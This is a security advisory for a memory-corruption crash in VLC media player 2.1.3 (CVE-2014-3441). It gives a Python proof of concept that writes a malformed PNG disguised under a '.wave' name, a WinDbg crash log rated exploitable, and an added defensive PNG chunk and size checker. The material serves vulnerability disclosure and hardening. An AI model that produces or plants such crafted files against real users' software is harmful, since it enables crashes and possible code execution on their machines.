# Exploit Title: VLC media player 2.1.3 (latest release at time of writing) memory corruption via malformed PNG
# Date: 2014/05/07
# Exploit Author: Aryan Bayaninejad
# Linkedin: https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: www.videolan.org
# Software Link: http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/
# Version: 2.1.3 and prior
# Tested on: Windows XP SP3 x86
# CVE: 2014-3441

Details:

VLC media player 2.1.3 and earlier versions suffer from a memory corruption
vulnerability when a malformed PNG file is decoded by codec\libpng_plugin.dll.
The file extension does not matter: the PoC is written out as poc.wave, and
VLC still probes the content, hands it to demux\libimage_plugin.dll and then
loads codec\libpng_plugin.dll, as the WinDbg log below shows.

The PoC file is 86 bytes: a valid PNG signature; an IHDR declaring a width of
0x7FFFFFFF pixels (the largest value the format permits), a height of 0x102,
1 bit per pixel and palette colour type 3; a one-entry PLTE; a one-byte tRNS;
and an IDAT whose declared length (0x00689201) far exceeds the bytes that
follow it, ending in an "IEND" tag plus its CRC without the usual length
field. The crash is a write access violation in msvcrt!memset (rep stos with
eax=0, i.e. a zero fill) at edi=0x018e5000, a page boundary, with
ecx=0x03ffe8c8 dwords (roughly 256 MB) still to be written. That is consistent
with a row buffer sized from the 0x7FFFFFFF width (0x10000000 bytes per row at
1 bpp) being far larger than the memory actually mapped behind it. !exploitable
rates the write AV as EXPLOITABLE. Note what the PoC actually gives an attacker:
if the fill length derives from the IHDR width, the attacker controls how far
past the buffer the zero fill runs, but not the bytes written; the PoC is a
reliable crash, and anything beyond that depends on the heap layout at the
time of decoding.

PoC:

#!/usr/bin/python
# Python 2 PoC from the advisory; the bytes literal and open()/print() calls
# also let it run unchanged under Python 3.
# Byte layout: PNG signature, IHDR (width 0x7FFFFFFF, height 0x102, 1 bpp,
# colour type 3), PLTE (1 entry), tRNS (1 byte), IDAT (declared length
# 0x689201), then "IEND" + its CRC without the usual 4-byte length field.
data = b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
# Write it under a misleading extension; VLC probes the content, not the name.
with open("poc.wave", "wb") as outfile:
    outfile.write(data)
print("Created Poc")

windbg result:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe"
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00400000 00426000   image00400000
ModLoad: 7c900000 7c9af000   ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 6a300000 6a324000   C:\Program Files\VideoLAN\VLC\libvlc.dll
ModLoad: 6a540000 6a791000   C:\Program Files\VideoLAN\VLC\libvlccore.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.DLL
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76bf0000 76bfb000   C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 771b0000 7725a000   C:\WINDOWS\system32\WININET.DLL
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 774e0000 7761d000   C:\WINDOWS\system32\ole32.dll
(250.c1c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48 edi=00351eb4
eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:000> g
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\version.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 10000000 10008000   C:\Program Files\Internet Download Manager\idmmkb.dll
ModLoad: 64fc0000 65008000   C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
ModLoad: 6aac0000 6aacf000   C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
ModLoad: 6e980000 6e990000   C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
ModLoad: 6a100000 6a119000   C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
ModLoad: 6c400000 6c5f6000   C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
ModLoad: 68740000 68760000   C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
ModLoad: 6f440000 6f483000   C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
ModLoad: 6b840000 6b85b000   C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
ModLoad: 6f100000 6f114000   C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
ModLoad: 68bc0000 68bd7000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
ModLoad: 64a00000 64a8b000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
ModLoad: 70680000 70736000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
ModLoad: 6ae40000 6ae64000   C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
ModLoad: 69e40000 69e52000   C:\Program Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
ModLoad: 6d700000 6d70c000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
ModLoad: 70240000 70267000   C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
ModLoad: 6cd00000 6ce7a000   C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
ModLoad: 66040000 66090000   C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
ModLoad: 625c0000 626f9000   C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
ModLoad: 73f10000 73f6c000   C:\WINDOWS\system32\DSOUND.DLL
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 6ff40000 6ff55000   C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
ModLoad: 6e180000 6e191000   C:\Program Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.
ModLoad: 68e80000 6992e000   C:\Program Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.DLL
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.DLL
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\userenv.dll
ModLoad: 01a20000 01ce5000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 5d090000 5d12a000   C:\WINDOWS\system32\comctl32.dll
ModLoad: 76360000 76370000   C:\WINDOWS\system32\winsta.dll
ModLoad: 5b860000 5b8b5000   C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 6d6c0000 6d6f7000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 6e040000 6e05e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 68440000 68458000   C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 6c380000 6c39b000   C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
ModLoad: 6ef40000 6ef4e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
es demux error: cannot peek
es demux error: cannot peek
ModLoad: 011e0000 011fa000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
ModLoad: 6c2c0000 6c2cd000   C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
ModLoad: 62380000 6238e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
ModLoad: 67e00000 67e0d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
ModLoad: 03610000 036fc000   C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
ModLoad: 6bf40000 6bf65000   C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
ModLoad: 6f8c0000 6f8eb000   C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
ModLoad: 6a840000 6a96f000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
ModLoad: 70b00000 70b0c000   C:\Program Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
ModLoad: 6d8c0000 6d97b000   C:\Program Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll
ModLoad: 64740000 6474d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
ModLoad: 6cbc0000 6cbcd000   C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
ModLoad: 65300000 6530c000   C:\Program Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
ModLoad: 67500000 6750d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
ModLoad: 6ce80000 6ce8d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
ModLoad: 6fec0000 6fecc000   C:\Program Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll
ModLoad: 6b500000 6b56d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
ModLoad: 65280000 6528d000   C:\Program Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
ModLoad: 6c940000 6c94e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
ModLoad: 683c0000 6840f000   C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
(250.b14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -
eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80 edi=018e5000
eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
msvcrt!memset+0x41:
77c47631 f3ab            rep stos dword ptr es:[edi]
0:009> .load winext/msec.dll
0:009> !exploitable
!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\libvlccore.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll -
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419)
User mode write access violations that are not near NULL are exploitable.
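The checker below is an added example and is not part of the advisory, of VLC or of libpng. It walks the PNG chunk structure of the PoC bytes the way a hardened pre-decode stage should: it verifies chunk CRCs with zlib, refuses a declared chunk length that runs past the end of the data it was given, and derives the row and image buffer sizes from IHDR before anything is allocated. The PIXEL_BUDGET cap, the finding codes and the make_png() helper are assumptions made for illustration (the budget is not a VLC or libpng value). It also generalises past the PoC: make_png() builds a well-formed file with correct CRCs, so the same check runs over a sane 1x1 image and over a spec-legal but unallocatable 0x7FFFFFFF-wide one.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
PNG_MAX_DIMENSION = 0x7FFFFFFF       # PNG spec: width and height are 31-bit values
MAX_CHUNK_LEN = 0x7FFFFFFF           # PNG spec: chunk length is a 31-bit value
PIXEL_BUDGET = 64 * 1024 * 1024      # hypothetical allocation cap; not a VLC/libpng value
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}   # samples per pixel by PNG colour type

# The advisory's 86-byte PoC, reproduced as the sample input.
POC = (b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"
       b"\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02"
       b"\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84"
       b"\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8"
       b"\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66"
       b"\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68"
       b"\x42\x49\x45\x4E\x44\xAE\x42\x60\x82")


def walk_chunks(data):
    """Yield (type, payload, crc_ok, truncated) per chunk; stop at IEND or truncation."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("bad PNG signature")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = pos + 8
        # Never trust the declared length: it must fit inside what was actually read.
        if length > MAX_CHUNK_LEN or body + length + 4 > len(data):
            yield ctype, data[body:], False, True
            return
        payload = data[body:body + length]
        (crc,) = struct.unpack(">I", data[body + length:body + length + 4])
        crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == crc
        yield ctype, payload, crc_ok, False
        pos = body + length + 4
        if ctype == b"IEND":
            return


def parse_ihdr(data):
    """Return (width, height, bit_depth, colour_type) from the first chunk."""
    chunks = list(walk_chunks(data))
    if not chunks or chunks[0][0] != b"IHDR" or len(chunks[0][1]) != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    width, height, depth, colour = struct.unpack(">IIBBBBB", chunks[0][1])[:4]
    return width, height, depth, colour


def check_png(data):
    """Return the finding codes a hardened pre-decode check would raise (empty if sane)."""
    findings = []
    width, height, depth, colour = parse_ihdr(data)
    if not (0 < width <= PNG_MAX_DIMENSION and 0 < height <= PNG_MAX_DIMENSION):
        findings.append("DIMENSIONS")
    bpp = CHANNELS.get(colour, 0) * depth
    if bpp == 0:
        findings.append("COLOUR_TYPE")
    else:
        rowbytes = (width * bpp + 7) // 8          # bytes per unfiltered row, per the spec
        if rowbytes * height > 0xFFFFFFFF:
            findings.append("SIZE_OVERFLOW_32BIT")  # rows * height wraps a 32-bit size_t
        if rowbytes > PIXEL_BUDGET or rowbytes * height > PIXEL_BUDGET:
            findings.append("PIXEL_BUDGET")         # legal per spec, still too big to allocate
    chunks = list(walk_chunks(data))
    for ctype, payload, crc_ok, truncated in chunks:
        name = ctype.decode("latin-1")
        if truncated:
            findings.append("TRUNCATED_" + name)
        elif not crc_ok:
            findings.append("CRC_" + name)
    if chunks[-1][0] != b"IEND":
        findings.append("NO_IEND")
    return findings


def make_chunk(ctype, payload):
    """Length + type + payload + CRC over type and payload, as the spec requires."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_png(width, height, raw_rows=None):
    """Build a minimal well-formed 8-bit RGB PNG (correct CRCs) for comparison."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    if raw_rows is None:   # filter byte 0 followed by black pixels, for each row
        raw_rows = (b"\x00" + b"\x00" * (3 * width)) * height
    return (PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", zlib.compress(raw_rows)) + make_chunk(b"IEND", b""))


if __name__ == "__main__":
    print("poc.wave :", check_png(POC))
    print("1x1 PNG  :", check_png(make_png(1, 1)))
    print("huge PNG :", check_png(make_png(0x7FFFFFFF, 258, raw_rows=b"")))
```

Running it reports, for poc.wave, the 32-bit size overflow, the exceeded pixel budget, the truncated IDAT and the missing IEND (plus any chunk CRC mismatches), an empty list for the 1x1 image, and the two size findings for the huge but otherwise valid image. Note that the 0x7FFFFFFF width passes the dimension check in all three cases: the spec permits it, which is exactly why a decoder has to bound the buffer size it derives from the header rather than the declared dimensions alone.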